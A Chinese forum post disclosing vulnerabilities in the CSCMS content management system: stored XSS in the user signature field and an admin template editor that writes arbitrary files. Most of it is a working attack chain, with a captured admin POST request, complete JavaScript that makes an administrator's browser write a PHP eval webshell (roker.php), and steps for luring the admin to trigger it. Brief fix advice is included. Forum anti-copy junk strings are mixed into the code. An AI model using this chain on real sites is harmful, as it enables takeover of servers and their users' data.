这个 CMS 以前 90 有人发过一个 getshell，当时是后台验证文件的问题。
官网已经修补了，所以重新下载了源码。
因为后台登录还需要认证码，所以注入就没看了。
存在 XSS。
漏洞文件：user/member/skin_edit.php
/ F& \8 Y2 ?! C/ M. Y1 ^5 Y本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:! c3 I) U% ?# ^
% v& D; o; u* X: O! k
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>& y! H& U* l: p$ h4 r' [
; g$ J; b" e# V' t1 T- {6 L
</textarea></td></tr>1 A8 e4 \; U" E
user/do.php
/ r# \/ L/ m' y% N3 O5 S" d
. X/ T8 e: |1 t/ Sif($op=='zl'){ //资料6 b' ^, A8 J1 P G
! W' `7 g# d, X) i if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
% @) ?, }) @6 | exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));* ~5 g$ {( P3 @6 [4 m
* _! o4 c$ M. t9 N $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
% g; O. v" O+ K% ~+ l) o4 Y" F
7 U J. Y( R3 P5 _" A CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
. d1 @! b# E% f) t8 W5 Q where CS_Name='".$cscms_name."'";0 C& g2 f* S- v- Z, ?& }
. C# ]2 E# @3 z' G9 c" F$ k
if($db->query($sql)){+ Q. [3 h( }- V: G
- e1 W. p& T% I H' }; ]1 r
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));% C4 ~8 ?: D; H: @% d9 }: Y! T! ^
6 I3 O1 ~2 i7 ?. k0 e }else{
& D$ |% H+ x7 H- O# C5 H$ N: ` 8 [* g/ I4 l$ p2 I6 K8 B
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
* I8 P p9 n2 h" l* E ( A2 c& P" q5 U! S9 c# s
}# ?; T3 K/ R1 F" s( N9 S
E9 [4 |& k) j7 Z J# K8 c, d
没有过滤，导致 XSS 产生。修复方式：签名（CS_Qianm）入库前做 HTML 过滤，并在 skin_edit.php 输出 $cscms_qianm 以及在其他页面展示签名时用 htmlspecialchars 编码。
后台看了下，很奇葩的是可以写任意格式的文件。修复方式：skins.php 的写文件操作应把 name 的扩展名限制为模板类型、校验 path 不能跳出模板目录，并加上 CSRF token 校验，避免管理员在登录状态下被第三方页面触发该请求。
抓包如下。
, @" s* `* j0 Y' \ n `( T
7 e4 I8 V0 J' t6 d0 \$ I/ e- J+ P4 [4 G( G
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
. F) U1 A2 f% N* O* _7 N0 Q
9 G8 m6 ^ Q* F* `3 p. k: i6 YAccept: text/html, application/xhtml+xml, */*; i/ |2 m$ z, I) f
7 t- H/ O3 R( a. a# |5 H# x+ oReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
7 O% y8 @' R, c( ^9 A4 D
. p3 T* i5 N m4 LAccept-Language: zh-CN
7 ~9 \% p: }% Q/ L
$ V; `$ k; ~+ E" EUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)0 I" Q3 ?2 [3 Q' V/ }
2 t* Q0 @* a2 U! e
Content-Type: application/x-www-form-urlencoded! P( w" r- C& x, o# K. X
0 U) F* [8 W5 @; y l( b& @! UAccept-Encoding: gzip, deflate
M( ]1 }' h- S* L* U, C2 l D$ T6 R. b% h) b: B# j8 @' n
Host: 127.0.0.1
! o! m, l. E8 N1 {' x# D/ k
% e5 p' K& T- p: FContent-Length: 38. Y9 W8 h5 L l! P
' y3 @% g" Y* J5 r* T6 C" \% UDNT: 1$ Y$ _- ]$ p" M
6 Q( p+ a0 q2 |+ Z- t
Connection: Keep-Alive5 E3 l/ i3 R. Y* V. S/ T
9 a) b4 b% t5 S; y7 y
Cache-Control: no-cache
( W( l4 P* H0 B, O. w $ K6 l# T4 v- w0 @7 }1 ~8 u4 P
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655944 P) {+ p% U% q j6 R
' v0 J" ?% O. [! u" s
5 p5 X1 _; u, q6 m
name=aaa.php&content=%3Cs%3E%3Ca%25%3E4 }) ^, V3 L9 q. E3 A$ Z% R
/ o: ~/ T1 o& G& k& F5 m8 e! ^
! d1 x0 e& {# [4 X( H# f& I x8 ]+ t/ v; Y
于是构造 JS 如下。
% |5 U) m: k" i ]4 v! z9 S1 M
" p# z6 U4 `! F% q# _# q1 d& B本帖隐藏的内容<script> 2 X3 |. L, v3 w/ {, |) T! _& L z+ h
thisTHost = top.location.hostname;
9 L/ ]; ?5 D9 r. M
, i( t) w% Q& x% ^4 w3 r. i- B& d$ YthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
: S& b1 v+ F0 K
) Y7 S" U0 b( v6 }+ d" Gfunction PostSubmit(url, data, msg) {
( G( }3 A4 T( u" H- c var postUrl = url;3 K1 Q, p0 ^! D& H6 w
& p. z: {4 `, |% C7 ` var postData = data; , m3 ]( {2 {/ q# f9 b
var msgData = msg; " K: h* v' W2 l5 ~ @
var ExportForm = document.createElement("FORM");
4 f! T7 t; H" i9 o document.body.appendChild(ExportForm);
+ u! o2 I' J( I ExportForm.method = "POST"; * q) Z* m2 ^7 |
var newElement = document.createElement("input");
; c; g+ M5 d5 k8 ]1 f! o- G newElement.setAttribute("name", "name");
" `+ j' i1 ?/ [4 x8 X1 |# S/ W s newElement.setAttribute("type", "hidden"); ; f6 G+ {$ s: |% Z. e" N- x
var newElement2 = document.createElement("input"); % K* S% f4 t' |; K; Z' d$ j
newElement2.setAttribute("name", "content");
6 x+ }5 k7 z6 r+ h5 ` newElement2.setAttribute("type", "hidden"); ) O6 g4 ?- M X6 ?
ExportForm.appendChild(newElement); # d/ G' L8 K, G5 E; H
ExportForm.appendChild(newElement2); ; }' u2 P) g) i( X
newElement.value = postData;
0 [* Z/ G% V5 y+ t# A b newElement2.value = msgData; # G0 M) \+ K2 h3 v
ExportForm.action = postUrl; : }: P' ~4 K( H- r$ W2 Q
ExportForm.submit();
& _2 q* g& h! p- z9 U};7 { Q4 t; z3 _
0 W( |$ O+ V8 P6 \: E" O# M8 W
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
5 R- @6 F9 E2 ? 0 t6 O2 x/ j- G+ ]3 `! X
</script>
9 S0 s1 e6 l1 A+ A2 ?' C- u) D$ m
' z7 p+ V$ X1 W' u1 w
! c2 R3 C0 t5 p" E5 Q5 T2 [! Q: ?4 b! g& @
在 http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处插入上述脚本。
用你的账号给管理员写个私信，或者让他访问你的主页 http://127.0.0.1/home/?uid=2（uid 自己改）。
就会在 skins\index\html\ 目录下生成 roker.php 一句话。